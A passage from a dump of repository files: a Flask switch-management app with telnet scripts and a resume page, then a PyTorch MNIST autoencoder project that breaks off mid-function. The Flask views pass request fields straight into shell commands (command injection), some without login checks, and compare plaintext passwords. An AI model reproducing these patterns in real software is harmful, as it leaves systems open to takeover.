"text": "import os\nimport sys\nimport time\nimport re\nimport telnetlib\n\nhost = '10.5.1.2'\nuser = '***'\npassword = '***'\n\ntry:\n PORT=(sys.argv[1])\nexcept:\n pass\n\n\ndef optical():\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('show ont optical-info 1 all\\r\\n')\n time.sleep(1)\n r1 = tn.read_very_eager().split('OLT')[6]\n print(r1)\n tn.close()\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('interface epon 0/0\\r\\n')\n tn.write('show ont info 1 all\\r\\n')\n time.sleep(1)\n r2 = tn.read_very_eager().split('OLT')[6]\n print(r2)\n tn.close()\n\n tn = telnetlib.Telnet(host)\n tn.write(user + '\\r\\n')\n tn.write(password + '\\r\\n')\n tn.write('enable\\r\\n')\n tn.write('config\\r\\n')\n tn.write('vty output show-all\\r\\n')\n tn.write('show mac-address port epon 0/0/1 with-ont-location\\r\\n')\n time.sleep(1)\n r3 = tn.read_very_eager().split('OLT')[5]\n print(r3)\n tn.close()\n\noptical()\n\n\n"
},
{
"alpha_fraction": 0.6683416962623596,
"alphanum_fraction": 0.6884422302246094,
"avg_line_length": 14.230769157409668,
"blob_id": "5fa77b58a72063a9237d3227722d9c1af76b9b49",
"content_id": "2691623af5f13f4015a8aca342462003a6eba0ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 199,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 13,
"path": "/run.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "from app import app\nfrom app import db\nfrom blog.blueprint import posts\n\nimport views\n\n### Blueprint\n\napp.register_blueprint(posts, url_prefix='/')\n\n\nif __name__=='__main__':\n app.run(port=8000)\n\n"
},
{
"alpha_fraction": 0.5908962488174438,
"alphanum_fraction": 0.594846248626709,
"avg_line_length": 26.191816329956055,
"blob_id": "31febd81ef08e28053ada1d0e5d5973b4aea4160",
"content_id": "5361cd91f85404e064279f66c9ced936b568a997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10633,
"license_type": "no_license",
"max_line_length": 170,
"num_lines": 391,
"path": "/views.py",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport subprocess\nimport telnetlib\n#from app import *\nfrom app import app\nfrom app import db\nfrom flask import render_template, request, flash, session, url_for, redirect, make_response, jsonify\nimport pdfkit\n#from flask import send_file, send_from_directory, safe_join, abort, jsonify\nimport pymysql.cursors\nimport pymysql\nfrom models import User, SwInfo, VlanInfo\nfrom flask_security import login_required\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\[email protected](\"/login\",methods = ['POST', 'GET'])\ndef login():\n login = request.form.get('login')\n password = request.form.get('password')\n\n user = User.query.filter_by(login=login, password=password).first()\n if not user:\n flash('Please enter correct data')\n return render_template('login.html')\n return render_template('index.html')\n\n\n\[email protected](\"/shell\",methods = ['POST', 'GET'])\n@login_required\ndef shell():\n return render_template('shell.html')\n\n\n\n\n\[email protected](\"/vagrant\",methods = ['POST', 'GET'])\n@login_required\ndef vagrant():\n ip = request.form.get('ip')\n command = request.form.get('command')\n command_success = 'python scripts/command.py'+' ' + str(ip) + ' ' + '\"' + command + '\"'\n result = subprocess.check_output(\n [command_success], shell=True)\n print(result)\n return render_template('top.html', result=result)\n\n\[email protected](\"/shelline\",methods = ['POST', 'GET'])\n@login_required\ndef shelline():\n return redirect('https://185.190.150.10:8085/')\n\n\n\n\[email protected](\"/graff\",methods = ['POST', 'GET'])\ndef graff():\n\n rng = np.arange(50)\n rnd = np.random.randint(0, 10, size=(3, rng.size))\n yrs = 1950 + rng\n\n fig, ax = plt.subplots(figsize=(5, 3))\n ax.stackplot(yrs, rng + rnd, labels=['Eastasia', 'Eurasia', 'Oceania'])\n ax.set_title('Combined debt growth over time')\n ax.legend(loc='upper left')\n ax.set_ylabel('Total debt')\n ax.set_xlim(xmin=yrs[0], xmax=yrs[-1])\n fig.tight_layout()\n\n render_template('graff.html', result=plt.show())\n\n\n\n\n#Reboot\[email protected]('/reboot',methods = ['POST', 'GET'])\n@login_required\ndef reboot():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n mySql_select_Query = '''SELECT * FROM `equipment_group` ORDER BY `name`'''\n cursor.execute(mySql_select_Query)\n\n\n return render_template('REBOOT/reboot.html', title='Reboot', cursor=cursor)\n cursor.close()\n conn.close()\n\n\[email protected]('/reboot/action/group',methods = ['POST','GET'])\ndef rebootaction():\n branch = request.args.get('branch')\n\n try:\n if len(branch):\n flash('Branch Successfully Reboot')\n command_success = 'python scripts/RebootGroup.py' + ' ' + str(branch) \n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n return redirect(url_for('reboot'))\n\n\n\[email protected]('/reboot/action/one',methods = ['POST','GET'])\ndef rebootactionone():\n ip = request.args.get('ip')\n\n try:\n if len(ip):\n flash('Switch Successfully Reboot')\n command_success = 'python scripts/Reboot.py' + ' ' + str(ip)\n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n return redirect(url_for('reboot'))\n\n\n\n\n#Ajax\[email protected]('/ajax',methods = ['POST','GET'])\ndef ajax():\n\n return render_template('AJAX/ajax.html', title='Ajax')\n\n\n\n\n\n#Resume\[email protected]('/summary')\ndef resume():\n\n return 
render_template('RESUME/resume.html', title='Resume')\n\n\[email protected]('/summary/pdf')\ndef pdf():\n rendered = render_template('test.html')\n pdf = pdfkit.from_string(rendered,False)\n response = make_response(pdf)\n response.headers['Content-Type'] ='application/pdf'\n response.headers['Content-Disposition'] ='attachment; filename=output.pdf'\n\n return response\n\n\n\n#Generator\[email protected]('/generator')\n@login_required\ndef config():\n\n return render_template('config.html', title='Generator')\n\n\n\[email protected]('/get-config', methods = ['POST'])\n@login_required\ndef getconfig():\n vlanext = request.form.get('vlanext')\n vlanextid = request.form.get('vlanextid')\n vlannat = request.form.get('vlannat')\n vlannatid = request.form.get('vlannatid')\n vlanfake = request.form.get('vlanfake')\n vlanfakeid = request.form.get('vlanfakeid')\n vlansw = request.form.get('vlansw')\n vlanswid = request.form.get('vlanswid')\n ip = request.form.get('ip')\n gateway = ip[:6]+'.1'\n return render_template('get-config.html',vlanext=vlanext, vlanextid=vlanextid, \n vlannat=vlannat, vlannatid=vlannatid, vlanfake=vlanfake ,\n vlanfakeid=vlanfakeid, vlansw=vlansw, vlanswid=vlanswid, ip=ip, gateway=gateway)\n\n\n\[email protected]('/vlan-list')\n@login_required\ndef vlanlist():\n conn = ( pymysql.connect(host = '***',\n user = '***',\n password = '***',\n database = '***',\n charset='utf8' ) )\n\n cursor = conn.cursor()\n mySql_select_Query = '''SELECT h.id\n , k.name type\n , h.name\n , h.startIp\n , h.stopIp\n , h.gateway\n , h.mask\n , vl.vlan vlans\n ,(SELECT count(*) FROM eq_bindings WHERE INET_ATON(ip) BETWEEN INET_ATON(startIp) and INET_ATON(stopIp)) bindings\n FROM `eq_neth` h\n JOIN eq_kinds k on k.id = h.type\n LEFT JOIN (SELECT GROUP_CONCAT(vl.vlan) vlan, neth FROM eq_vlan_neth n JOIN eq_vlans vl on vl.id = n.vlan GROUP BY neth) vl on vl.neth = h.id\n ORDER by 2,4'''\n cursor.execute(mySql_select_Query)\n return render_template('vlan-list.html', cursor=cursor)\n cursor.close()\n conn.close()\n\n\[email protected](\"/get-image/<image_name>\")\ndef get_image(image_name):\n\n try:\n return send_from_directory(app.config[\"FILE_STORAGE\"], filename=image_name, as_attachment=True)\n except FileNotFoundError:\n abort(404)\n\n#SWITCH_INFO\n\[email protected](\"/switch-info\" ,methods = ['POST', 'GET'])\ndef swinfo():\n sw = SwInfo.query.all()\n return render_template('SW_INFO/switch-info.html',sw=sw)\n\n\n\[email protected](\"/switch-add/new\",methods = ['POST', 'GET'])\n@login_required\ndef swnew():\n\n return render_template('SW_INFO/switch-add-new.html')\n\n\n\n\[email protected](\"/switch-add\",methods = ['POST', 'GET'])\n@login_required\ndef swadd():\n\n sw = request.form.get('sw')\n ip = request.form.get('ip')\n location = request.form.get('location')\n presence = request.form.get('presence')\n fvlan = request.form.get('fvlan')\n model = request.form.get('model')\n\n s = SwInfo(sw=sw, ip=ip, location=location, presence=presence, fixed_vlan=fvlan, model=model)\n db.session.add(s)\n db.session.commit()\n return redirect(url_for('swinfo'))\n\n\[email protected](\"/switch-edit=<int:id>\",methods = ['POST', 'GET'])\n@login_required\ndef swedit(id):\n switches = SwInfo.query.filter(SwInfo.id == id)\n return render_template('SW_INFO/switch-edit.html',switches=switches)\n\n\[email protected](\"/switch-update\",methods = ['POST', 'GET'])\n@login_required\ndef swupdate():\n\n if request.method == 'POST':\n id = request.form.get('id')\n sw = request.form.get('sw')\n ip = 
request.form.get('ip')\n location = request.form.get('location')\n presence = request.form.get('presence')\n fvlan = request.form.get('fvlan')\n model = request.form.get('model')\n\n s = SwInfo.query.filter(SwInfo.id == id).first()\n s.sw = sw\n s.ip = ip\n s.location = location\n s.presence = presence\n s.fixed_vlan = fvlan\n s.model = model\n db.session.commit()\n\n return redirect(url_for('swinfo'))\n\n#VLAN_INFO\n\[email protected](\"/switch-vlan\" ,methods = ['POST', 'GET'])\ndef vinfo():\n vlan = VlanInfo.query.all()\n return render_template('VLAN_INFO/switch-vlan.html',vlan=vlan)\n\n\[email protected](\"/switch-vlan/new\" ,methods = ['POST', 'GET'])\ndef vnew():\n\n return render_template('VLAN_INFO/switch-vlan-new.html')\n\[email protected](\"/switch-vlan/add\" ,methods = ['POST', 'GET'])\ndef vadd():\n\n if request.method == 'POST':\n vlanid = request.form.get('vlanid')\n vlanname = request.form.get('vlanname')\n network = request.form.get('network')\n group = request.form.get('group')\n desc = request.form.get('desc')\n \n v = VlanInfo(vlanid=vlanid, vlanname=vlanname, network=network, group=group, desc=desc)\n db.session.add(v)\n db.session.commit()\n\n\n return redirect(url_for('vinfo'))\n\n\[email protected](\"/vlan-edit=<int:id>\",methods = ['POST', 'GET'])\n@login_required\ndef vedit(id):\n vlan = VlanInfo.query.filter(VlanInfo.id == id)\n return render_template('VLAN_INFO/switch-vlan-edit.html',vlan=vlan)\n\n\n\[email protected](\"/switch-vlan/edit\",methods = ['POST', 'GET'])\n@login_required\ndef vupdate():\n\n if request.method == 'POST':\n id = request.form.get('id')\n vlanid = request.form.get('vlanid')\n vlanname = request.form.get('vlanname')\n network = request.form.get('network')\n group = request.form.get('group')\n desc = request.form.get('desc')\n\n v = VlanInfo.query.filter(VlanInfo.id == id).first()\n v.vlanid = vlanid\n v.vlanname = vlanname\n v.network = network\n v.group = group\n v.desc = desc\n db.session.commit()\n\n return redirect(url_for('vinfo'))\n\n\n\n\n\n\n#OLT_INFO\n\[email protected](\"/olt/pon/\",methods = ['POST', 'GET'])\ndef pon():\n\n port = request.args.get('port')\n vlan = request.args.get('vlan')\n\n try:\n command_success = 'python scripts/olt.py' \n result = subprocess.check_output(\n [command_success], shell=True)\n except:\n pass\n\n try:\n if len(port) > 0 and len(vlan) > 0:\n flash('ONU Successfully Registered')\n command_success2 = 'python scripts/pon.py' + ' ' + str(port) + ' ' + str(vlan)\n result2 = subprocess.check_output(\n [command_success2], shell=True)\n except:\n pass\n return render_template('olt.html', result=result)\n\[email protected]('/switch-vlan')\ndef svlan():\n\n return render_template('switch-vlan.html', title='SVlan')\n\n"
},
{
"alpha_fraction": 0.48736461997032166,
"alphanum_fraction": 0.7111913561820984,
"avg_line_length": 45.16666793823242,
"blob_id": "a873ecc64aaa5268230413a52bcedf1744526fc3",
"content_id": "91da5cc8c6619f3c2145dbd6d80c4ac756aea93d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 277,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 6,
"path": "/scripts/add_networks.sh",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin\nroute del default gw 172.1.2.1\nip route add 10.3.1.0/24 via 172.1.2.1 dev ens192\nip route add 10.4.1.0/24 via 172.1.2.1 dev ens192\nip route add 10.5.1.0/24 via 172.1.2.1 dev ens192\n"
},
{
"alpha_fraction": 0.6877551078796387,
"alphanum_fraction": 0.7076190710067749,
"avg_line_length": 37.08290100097656,
"blob_id": "c10f484e5dea9a57805b832de7b585487e51d8b2",
"content_id": "b3ad7930f0613ed4ce78cc90bdaca3dd93d37f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 7376,
"license_type": "no_license",
"max_line_length": 451,
"num_lines": 193,
"path": "/templates/resume.html",
"repo_name": "YatskoGrigoriy/MyFlaskBlog",
"src_encoding": "UTF-8",
"text": "<div class=\"container\">\n<link href=\"../static/css/resume.css\" rel=\"stylesheet\">\n<div class=\"wrapper\">\n<div class=\"sidebar-wrapper\">\n<div class=\"profile-container\">\n<img class=\"img-rounded\" src=\"../static/img/profile.png\" alt=\"\" />\n<h1 class=\"name\">Yatsko Grigoriy</h1>\n<h3 class=\"tagline\">DevOps, System Administrator, Network Engineer</h3>\n</div>\n<div class=\"contact-container container-block\">\n<ul class=\"list-unstyled contact-list\">\n<li class=\"email\"><i class=\"fa fa-envelope\"></i><a href=\"mailto: [email protected]\"><span class=\"\">[email protected]</span></a></li>\n<li class=\"website\"><i class=\"fa fa-globe\"></i><a href=\"https://grin.golden.net.ua\">grin.golden.net.ua</a></li>\n<li class=\"linkedin\"><i class=\"fa fa-linkedin\"></i><a href=\"https://ua.linkedin.com/in/яцко-григорий-8101359b\">ua.linkedin.com/in/яцко-григорий-8101359b</a></li>\n<li class=\"github\"><i class=\"fa fa-github\"></i><a href=\"https://github.com/YatskoGrigoriy/\">github.com/YatskoGrigoriy/</a></li>\n<li class=\"twitter\"><i class=\"fa fa-facebook\"></i><a href=\"https://www.facebook.com/people/Yatsko-Grigory/100004234628516\">facebook.com/people/Yatsko-Grigory/</a></li>\n</ul>\n</div>\n<div class=\"education-container container-block\">\n<h2 class=\"container-block-title\">Education</h2>\n<div class=\"item\">\n<h4 class=\"degree\">Specialist of Computer Systems and Networks</h4>\n<h5 class=\"meta\">National Telecomunication University of Ukraine 'Kyiv Department of Software Engineering'</h5>\n<div class=\"time\"> 2020-202*</div>\n</div>\n</div>\n<div class=\"language-container container-block\">\n<h2 class=\"container-block-title\">Languages</h2>\n<ul class=\"list-unstyled interests-list\">\n<li>English <span class=\"lang-desc\">(Basic)</span></li>\n<li>Ukrainian <span class=\"lang-desc\">(Native)</span></li>\n<li>Russian <span class=\"lang-desc\">(Professional)</span></li>\n</ul>\n</div>\n<div class=\"interests-container container-block\">\n<h2 class=\"container-block-title\">Interests</h2>\n<ul class=\"list-unstyled interests-list\">\n<li>Archery</li>\n<li>Fantasy and sci-fi</li>\n<li>Homelab</li>\n<li>#Monitoringlove</li>\n <li>Computer games</li>\n</ul>\n</div>\n</div>\n<div class=\"main-wrapper\">\n<section class=\"section summary-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-user\"></i>Career Profile</h2>\n<div class=\"summary\">\n<p>\n I’m IT specialist with almost 10 years of expirience in networking, system administration and devops areas.\n I worked as Network Operations Center Engineer in different ISP’s in Ukraine and was in core team of company which is in top 10 Ukrainian ISP’s.\n Nowadays I’m working as DevOps Engineer for 4 years in Berlin based companies.\n I’m trying to use all best practices of infrastructure as a code and automation in my everyday work.\n</p>\n</div>\n</section>\n<section class=\"section experiences-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-briefcase\"></i>Experiences</h2>\n<div class=\"item\">\n<div class=\"meta\">\n<div class=\"upper-row\">\n<h3 class=\"job-title\">DevOps Engineer</h3>\n<div class=\"time\">December 2018 - Present</div>\n</div>\n<div class=\"company\">GoldenNet ISP., Kyiv</div>\n</div>\n<div class=\"details\">\n<p></p>\n</div>\n</div>\n<div class=\"item\">\n<div class=\"meta\">\n<div class=\"upper-row\">\n<h3 class=\"job-title\">Network/System Administrator</h3>\n<div class=\"time\">April 2015 - July 2018</div>\n</div>\n<div class=\"company\">Eurolan ISP., 
Kyiv</div>\n</div>\n<div class=\"details\">\n<p></p>\n</div>\n</div>\n</section>\n<section class=\"section projects-section\">\n<h2 class=\"section-title\"><i class=\"fa fa-archive\"></i>Projects</h2>\n<div class=\"intro\">\n<p><strong>A list of interesting projects from my career.</strong></p>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://kyivstar.ua/uk/mm\">GoldenFiber Network (at the moment JSC Kyivstar)</a></span> - <span class=\"project-tagline\">In 2007 I was responsible for infrastructure planning and integration for the GoldenFiber company (since acquired by JSC ‘Kyivstar’). Together with our team we built their network in Kyiv and implemented solutions that helped to build a redundant network for this ISP.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://skif.com.ua/\">Skif ISP / Domashka.net Billing system</a></span> - <span class=\"project-tagline\">Integrated several payment systems and improved the customer experience with new features: bonus system, payments with bonus points etc.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://www.bklieferservice.de/\">Burger King Lieferservice</a></span> - <span class=\"project-tagline\">As an employee of DeliveryHero AG I was supporting and improving the infrastructure for the Burger King platform. It used AWS resources (CloudFormation, ELB, EC2, SNS, SQS etc), Puppet, Jenkins and ELK.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://github.com/l13t/pyWBacula\">pyWBacula</a></span> - <span class=\"project-tagline\">Python-based web interface with reports that help you investigate your backups by different parameters.</span>\n</div>\n<div class=\"item\">\n<span class=\"project-title\"><a href=\"https://exchange.icinga.com/l13t/\">Icinga2 plugins</a></span> - <span class=\"project-tagline\">Different Icinga2/Nagios plugins on the Icinga2 Exchange portal</span>\n</div>\n</section>\n<section class=\"skills-section section\">\n<h2 class=\"section-title\"><i class=\"fa fa-rocket\"></i>Skills & Proficiency</h2>\n<div class=\"skillset\">\n<div class=\"item\">\n<h3 class=\"level-title\">Linux OS family</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"95%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Databases</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Monitoring: Icinga2, Zabbix, Prometheus etc</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"95%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Virtualization</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"80%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Containerization</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">CI/CD</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"75%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with SaltStack</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"85%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with Puppet</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" 
data-level=\"55%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">System automation with Ansible</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"65%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">VoIP</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"70%\">\n</div>\n</div>\n</div>\n<div class=\"item\">\n<h3 class=\"level-title\">Network Administration</h3>\n<div class=\"level-bar\">\n<div class=\"level-bar-inner\" data-level=\"90%\">\n</div>\n</div>\n</div>\n</div>\n</section>\n</div>\n</div>\n\n<script src=\"https://ajax.cloudflare.com/cdn-cgi/scripts/7089c43e/cloudflare-static/rocket-loader.min.js\" defer=\"\"></script>\n\n</div>\n"
}
] | 14 |
mathurpulkit/Vanilla-Autoencoders | https://github.com/mathurpulkit/Vanilla-Autoencoders | 7101c8dcc4e4832824672a2421dc3c773eef6252 | 8610ecc10baae7e6af4b3b947e3f74f86b2916f4 | 7486d886fe748da0496d11f432a2c1a7bb965fa1 | refs/heads/main | 2023-02-05T15:33:22.198595 | 2020-12-23T14:29:33 | 2020-12-23T14:29:33 | 323,871,659 | 2 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6159999966621399,
"alphanum_fraction": 0.6159999966621399,
"avg_line_length": 24,
"blob_id": "1e9e3d21e609317c675ef8938c30dc1a8198824a",
"content_id": "b45e69d80fb46e11908eeb8f572ccb383896b733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 10,
"path": "/main.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import fc\nimport cnn\nprint(\"Welcome to Autoencoders! Please select your choice: \")\nprint(\"a. FC based\")\nprint(\"b. CNN based\")\nans = input(\"Enter your choice: \")\nif ans == 'a' or ans == 'A':\n fc.main()\nelif ans == 'b' or ans == 'B':\n cnn.main()\n"
},
{
"alpha_fraction": 0.5712187886238098,
"alphanum_fraction": 0.5964268445968628,
"avg_line_length": 32.21138381958008,
"blob_id": "eb380d9fb9933c0258ea9037c1e1c00162473d32",
"content_id": "6dd053ea466f3a412ef3cd34330aec46fa1256cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4086,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 123,
"path": "/cnn.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport processdata\nimport matplotlib.pyplot as plt\nimport numpy\nimport cv2\n\n# constants\nlr = 0.0008\nepoch = 8\nbatchsize = 64\nimgcheck = 1000 # Checks for that image's index in the test set(0-9999)\n# use imgcheck b/w 0-9990 because it shows 10 images starting from index of imgcheck\nmodelname = \"cnn2.pt\"\n\n\ndef read_data():\n traindata = processdata.read_input_cnn()\n print(\"Train data size is: \", traindata.shape[0]) # shows number of images in train set\n return traindata\n\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.l1 = nn.Conv2d(1, 8, 6, 2)\n self.l2 = nn.Conv2d(8, 32, 4, 4, 2)\n\n self.l3 = nn.Flatten() # Flattened into a 256-D vector\n self.bottle = nn.Linear(512, 200)\n self.fc2 = nn.Linear(200, 512)\n\n self.rl1 = nn.ConvTranspose2d(32, 8, 4, 4, 2)\n self.rl2 = nn.ConvTranspose2d(8, 1, 6, 2)\n return\n\n def forward(self, x):\n x = x.unsqueeze(1)\n x = F.relu(self.l1(x))\n x = F.relu(self.l2(x))\n\n x = self.l3(x)\n x = F.relu(self.bottle(x))\n x = F.relu(self.fc2(x))\n x = x.reshape((-1, 32, 4, 4))\n\n x = F.relu(self.rl1(x))\n x = torch.sigmoid(self.rl2(x))\n return x\n\n\ndef dec_network(traindata): # declare network\n net = Network()\n net.double() # prevents an error\n loss_func = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr=lr)\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n print(\"Initial Loss is \" + str(loss.item()))\n return net, optimizer, loss_func, loss.item()\n\n\ndef fit(net, traindata, optimizer, loss_func, loss_init):\n loss_batch = []\n loss_epoch = [loss_init]\n for i in range(epoch):\n for j in range(int(traindata.shape[0]/batchsize)):\n x_batch = traindata[j*batchsize:(j+1)*batchsize]\n optimizer.zero_grad()\n pred = net(x_batch)\n loss = loss_func(pred.squeeze(), x_batch)\n loss_batch.append(loss.item())\n loss.backward() # model learns by backpropagation\n optimizer.step() # model updates its parameters\n if (j+1) % 100 == 0:\n print(\"EPOCH No: \", i+1, \" \", (j+1), \" Batches done\")\n pred = net(traindata)\n loss = loss_func(pred.squeeze(), traindata)\n loss_epoch.append(loss.item())\n print(\"Loss after EPOCH No \" + str(i+1) + \": \" + str(loss.item())) # prints loss\n del loss\n return loss_epoch, loss_batch\n\n\n\n\ndef main():\n traindata = read_data()\n net, optimizer, loss_func, loss_init = dec_network(traindata)\n need_train = input(\"Enter 'm' to train model, anything else to load old model: \")\n if need_train == 'm' or need_train == 'M':\n loss_epoch, loss_batch = fit(net, traindata, optimizer, loss_func, loss_init)\n processdata.plot_graph(loss_epoch, loss_batch)\n need_save = input(\"Enter 's' to save model, anything else to not save: \")\n if need_save == 's' or need_save == 'S':\n print(\"Saving Model...\")\n torch.save(net.state_dict(), modelname)\n else:\n net.load_state_dict(torch.load(modelname))\n testdata = processdata.read_input_cnn('testdata.idx3')\n print(\"Original images are: \")\n img = numpy.asarray(testdata[imgcheck].squeeze())\n for i in range(1, 10):\n pic = numpy.asarray(testdata[imgcheck + i].squeeze())\n img = cv2.hconcat([img, pic])\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n pred = net(testdata)\n loss = loss_func(pred.squeeze(), testdata)\n print(\"Final Loss on Test set is: \" + str(loss.item()))\n print(\"Regenerated images are: \")\n img = pred[imgcheck].squeeze().detach().numpy()\n for 
i in range(1, 10):\n pic = pred[imgcheck+i].squeeze().detach().numpy()\n img = cv2.hconcat([img, pic])\n img = img.squeeze()\n plt.axis('off')\n plt.imshow(img, cmap='Greys_r')\n plt.show()\n return\n\n"
},
{
"alpha_fraction": 0.6724941730499268,
"alphanum_fraction": 0.688811182975769,
"avg_line_length": 27.600000381469727,
"blob_id": "9eb312a3cb6fdf06beac89891ad99ac1e7748ef7",
"content_id": "7ba7683b208a262efae6c59c8ecb217d3e2580db",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 858,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 30,
"path": "/processdata.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport idx2numpy\nimport matplotlib.pyplot as plt\nimport torch\n\n\ndef read_input_fc(ifilename = \"traindata.idx3\"): #reads img file and label files and returns arrays\n images = idx2numpy.convert_from_file(ifilename) # variable will store images in 3-D array\n imgdata = np.reshape(images, newshape=[images.shape[0], -1])/255\n imgdata = torch.from_numpy(imgdata)\n return imgdata\n\ndef read_input_cnn(ifilename = \"traindata.idx3\"):\n images = idx2numpy.convert_from_file(ifilename)\n images = images/255\n images = torch.from_numpy(images)\n return images\n\ndef plot_graph(loss_epoch, loss_batch):\n plt.plot(loss_epoch)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"No of EPOCHS\")\n plt.show()\n plt.clf()\n plt.plot(loss_batch)\n plt.ylabel(\"Loss\")\n plt.xlabel(\"No of Batches\")\n plt.show()\n plt.clf()\n return\n"
},
{
"alpha_fraction": 0.5819777846336365,
"alphanum_fraction": 0.6049574017524719,
"avg_line_length": 33.87387466430664,
"blob_id": "092790b3dd9caa51fb82532c290a0b4e95049977",
"content_id": "7d71799b18803a80b333779ce83e3f8866092ba3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3873,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 111,
"path": "/fc.py",
"repo_name": "mathurpulkit/Vanilla-Autoencoders",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport processdata\nimport matplotlib.pyplot as plt\nimport numpy\nimport cv2\n\n# constants\nlr = 0.004\nepoch = 5\nbatchsize = 32\nimgcheck = 3000 # Checks for that image's index in the test set(0-9999)\n# use imgcheck b/w 0-9990 because it shows 10 images starting from index of imgcheck\nmodelname = \"fc.pt\"\n\ndef read_data():\n traindata = processdata.read_input_fc()\n print(\"Train data size is: \", traindata.shape[0]) # shows number of images in train set\n return traindata\n\n\nclass Network(nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.fc1 = nn.Linear(784, 400)\n self.fc2 = nn.Linear(400, 100)\n self.fc3 = nn.Linear(100, 400)\n self.fc4 = nn.Linear(400, 784)\n return\n\n def forward(self, x):\n x = self.fc1(x)\n x = F.relu(x)\n x = self.fc2(x) # Linear Activation instead of ReLU for bottleneck layer\n x = self.fc3(x)\n x = F.relu(x)\n x = self.fc4(x)\n x = torch.sigmoid(x)\n return x\n\ndef dec_network(traindata): # declare network\n net = Network()\n net.double() # prevents an error\n loss_func = nn.MSELoss()\n optimizer = optim.Adam(net.parameters(), lr=lr)\n pred = net(traindata)\n loss = loss_func(pred, traindata)\n print(\"Initial Loss is \" + str(loss.item()))\n return net, optimizer, loss_func, loss.item()\n\n\ndef fit(net, traindata, optimizer, loss_func, loss_init):\n loss_batch = []\n loss_epoch = [loss_init]\n for i in range(epoch):\n for j in 